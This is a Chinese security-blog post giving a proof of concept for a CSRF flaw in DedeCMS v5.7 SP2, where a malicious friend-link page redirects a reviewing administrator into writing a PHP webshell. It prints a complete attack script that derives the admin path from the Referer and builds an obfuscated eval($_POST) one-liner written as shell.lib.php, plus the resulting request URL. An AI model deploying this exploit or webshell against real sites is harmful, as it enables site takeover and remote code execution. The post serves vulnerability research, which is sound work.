DedeCMS_v5.7_友情链接CSRF_GetShell

admin 2022年11月11日14:49:36安全博客评论6 views943字阅读3分8秒阅读模式

Affected Version

DedeCMS-V5.7-UTF8-SP2 ( 发布日期 2017-03-15 )

下载地址: 链接: https://pan.baidu.com/s/1bprjPx1 密码: mwdq

PoC

该版本在新建&修改标签功能(可以写PHP文件到本地)存在CSRF漏洞,通过申请友情链接的方式,诱使管理员点击,从而从 Referer 中拿到 后台路径,进而以管理员的身份写一句话到服务器上 GetShell 。

测试:

  1. 申请友链
DedeCMS_v5.7_友情链接CSRF_GetShellDedeCMS_v5.7_友情链接CSRF_GetShell
  1. 编辑 友链 信息
DedeCMS_v5.7_友情链接CSRF_GetShellDedeCMS_v5.7_友情链接CSRF_GetShell

dedecms_csrf.php 的内容如下:

<?php
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'''.'c'.'''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();
  1. 管理员登陆后台后 对 友链进行审核
DedeCMS_v5.7_友情链接CSRF_GetShellDedeCMS_v5.7_友情链接CSRF_GetShell
  1. 审核的时候一般都会点击 地址 看一下网站的内容,由于友链中使用了header 跳转,所以结果其实是访问了 http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%[email protected]($_POST[%27c%27]);?%3E&filename=shell.lib.php 请求。
DedeCMS_v5.7_友情链接CSRF_GetShellDedeCMS_v5.7_友情链接CSRF_GetShell
  1. 查看写入到服务器的一句话 shell.lib.php
DedeCMS_v5.7_友情链接CSRF_GetShellDedeCMS_v5.7_友情链接CSRF_GetShell

References

  1. http://0day5.com/archives/4209/

FROM:无垠の安全

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月11日14:49:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  DedeCMS_v5.7_友情链接CSRF_GetShell http://cn-sec.com/archives/1404232.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: